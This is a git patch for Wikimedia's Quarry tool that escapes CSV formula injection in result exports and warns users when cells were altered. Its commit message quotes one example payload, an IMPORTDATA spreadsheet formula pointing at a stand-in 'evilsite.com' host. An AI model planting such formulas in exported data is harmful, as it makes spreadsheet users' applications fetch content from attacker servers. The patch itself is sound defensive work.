From 8fbfca51b4eed8b076f58ddd6b9f79424b6f9950 Mon Sep 17 00:00:00 2001
From: Framawiki <framawiki@tools.wmflabs.org>
Date: Sun, 2 Dec 2018 14:51:38 +0100
Subject: [PATCH] SECURITY: escape CSV injections

The "export resultsets" function of Quarry was not
protected against CSV Injection, aka Formula Injection.

https://www.owasp.org/index.php/CSV_Injection
https://pentestmag.com/formula-injection/
http://georgemauer.net/2017/10/07/csv-injection.html

For example, this query:

    select '=IMPORTDATA("https://evilsite.com")';

Was creating when exported as CSV a file that contains:

"=IMPORTDATA(""https://evilsite.com"")"
"=IMPORTDATA(""https://evilsite.com"")"

For example, this file, when imported in Google Docs,
was loading the remote url without warnings.

This patch escapes problematic cases in exports and shows
a warning to the user in the query view page.

Tabulate "\t" is added as cell prefix for ones that
starts with one of the four problematic charters,

    =-+@

The escape is done when the worker saves the query result.
Both resultset header and content are escaped.
Boolean is also saved in query meta information in the
db, which makes it possible to show a warning to the user
just above the resultset on the query result view, to
inform him that the saved data has been altered.
Note that we'll able to create a wiki page that explains
it and link to it from the message.

Bug: T209226
Change-Id: I099a836897c76852e13a708c8ba57532aaeab6e8
---
 quarry/web/output.py                           |  1 +
 quarry/web/results.py                          | 18 +++++++++++++++---
 quarry/web/static/js/query/view.js             |  3 ++-
 quarry/web/static/templates/compiled.js        |  7 ++++++-
 .../web/static/templates/query-resultset.html  |  5 +++++
 5 files changed, 29 insertions(+), 5 deletions(-)

diff --git a/quarry/web/output.py b/quarry/web/output.py
index d2001b6..bc4b9a7 100644
--- a/quarry/web/output.py
+++ b/quarry/web/output.py
@@ -105,6 +105,7 @@ def json_formatter(qrun, reader, resultset_id):
             'run_id': qrun.id,
             'rev_id': qrun.rev.id,
             'query_id': qrun.rev.query.id,
+            'injection_escaped': json.loads(qrun.extra_info)['resultsets'][resultset_id].get('injection_escaped', False)
         },
         'headers': header,
         'rows': rows
diff --git a/quarry/web/results.py b/quarry/web/results.py
index 4ee782f..738885a 100644
--- a/quarry/web/results.py
+++ b/quarry/web/results.py
@@ -8,7 +8,7 @@ from decimal import Decimal
 INITIAL_SQL = """
 CREATE TABLE resultsets (id, headers, rowcount)
 """
-
+TEST_CSV_INJECTION_PREFIXS = '=-+@'
 
 class SQLiteResultWriter(object):
     def __init__(self, qrun, path_template):
@@ -22,11 +22,23 @@ class SQLiteResultWriter(object):
         self.resultset_id = 0
         self._resultsets = []
 
+    def _injection_escape(self, element, remove=False):
+        """
+        Escape possible CSV injection. T209226
+        """
+        for test in TEST_CSV_INJECTION_PREFIXS:
+            if str(element).startswith(test):
+                self._resultsets[self.resultset_id]['injection_escaped'] = True
+                return '\t' + element
+        return element
+
     def _get_current_resultset_table(self):
         return "resultset_%s" % self.resultset_id
 
     def start_resultset(self, columns, rowcount):
-        self._resultsets.append({'headers': columns, 'rowcount': rowcount})
+        self._resultsets.append({})
+        columns = [self._injection_escape(c) for c in columns]
+        self._resultsets[self.resultset_id].update({'headers': columns, 'rowcount': rowcount})
         sanitized_columns = [self._quote_identifier(c) for c in columns]
         table_name = self._get_current_resultset_table()
         sql = "CREATE TABLE %s (__id__ INTEGER PRIMARY KEY, %s)" % (table_name, ', '.join(sanitized_columns))
@@ -50,7 +62,7 @@ class SQLiteResultWriter(object):
                 elif isinstance(c, Decimal):
                     sanitized_row.append(float(c))
                 else:
-                    sanitized_row.append(c)
+                    sanitized_row.append(self._injection_escape(c))
             sanitized_rows.append(sanitized_row)
         sql = "INSERT INTO %s VALUES (NULL, %s)" % (table_name, ("?," * self.column_count)[:-1])
         self.db.executemany(sql, sanitized_rows)
diff --git a/quarry/web/static/js/query/view.js b/quarry/web/static/js/query/view.js
index 09e0490..255dc5a 100644
--- a/quarry/web/static/js/query/view.js
+++ b/quarry/web/static/js/query/view.js
@@ -174,7 +174,8 @@ $( function () {
 					resultset_id: resultset_id,
 					run_id: qrun_id,
 					query_id: vars.query_id,
-					slugify_title: slugifyTitle()
+					slugify_title: slugifyTitle(),
+					injection_escaped: data.meta.injection_escaped
 				} ) ),
 				$table = tableContainer.find( 'table' );
 			$( '#query-result' ).append( tableContainer );
diff --git a/quarry/web/static/templates/compiled.js b/quarry/web/static/templates/compiled.js
index adc5477..3406fdb 100644
--- a/quarry/web/static/templates/compiled.js
+++ b/quarry/web/static/templates/compiled.js
@@ -18,7 +18,12 @@ output += "\n            ";
 }
 output += "\n            (";
 output += runtime.suppressValue(runtime.contextOrFrameLookup(context, frame, "rowcount"), env.opts.autoescape);
-output += " rows)\n        </div>\n        <div class='col-md-4'>\n            <div class=\"btn-group pull-right\">\n                <button type=\"button\" class=\"btn btn-info btn-xs dropdown-toggle\" data-toggle=\"dropdown\">\n                    Download data <span class=\"caret\"></span>\n                </button>\n                <ul class=\"dropdown-menu\" role=\"menu\">\n                    ";
+output += " rows)\n        </div>\n        ";
+if(runtime.contextOrFrameLookup(context, frame, "injection_escaped")) {
+output += "\n        <div class='resultset-header col-md-8' id='csvescapedmsg'>\n            This resultset incorporated a potential data injection that could pose security issues. The problematic data was deactivated, but the exportable data had to be modified.\n        </div>\n        ";
+;
+}
+output += "\n        <div class='col-md-4'>\n            <div class=\"btn-group pull-right\">\n                <button type=\"button\" class=\"btn btn-info btn-xs dropdown-toggle\" data-toggle=\"dropdown\">\n                    Download data <span class=\"caret\"></span>\n                </button>\n                <ul class=\"dropdown-menu\" role=\"menu\">\n                    ";
 frame = frame.push();
 var t_3 = {"tsv": "TSV","json": "JSON","json-lines": "JSON Lines","csv": "CSV","wikitable": "Wikitable","html": "HTML","xlsx": "Excel XLSX"};
 if(t_3) {var t_1;
diff --git a/quarry/web/static/templates/query-resultset.html b/quarry/web/static/templates/query-resultset.html
index 04e10f1..a8362a5 100644
--- a/quarry/web/static/templates/query-resultset.html
+++ b/quarry/web/static/templates/query-resultset.html
@@ -8,6 +8,11 @@
             {% endif %}
             ({{rowcount}} rows)
         </div>
+        {% if injection_escaped %}
+        <div class='resultset-header col-md-8' id='csvescapedmsg'>
+            This resultset incorporated a potential data injection that could pose security issues. The problematic data was deactivated, but the exportable data had to be modified.
+        </div>
+        {% endif %}
         <div class='col-md-4'>
             <div class="btn-group pull-right">
                 <button type="button" class="btn btn-info btn-xs dropdown-toggle" data-toggle="dropdown">
-- 
2.17.1

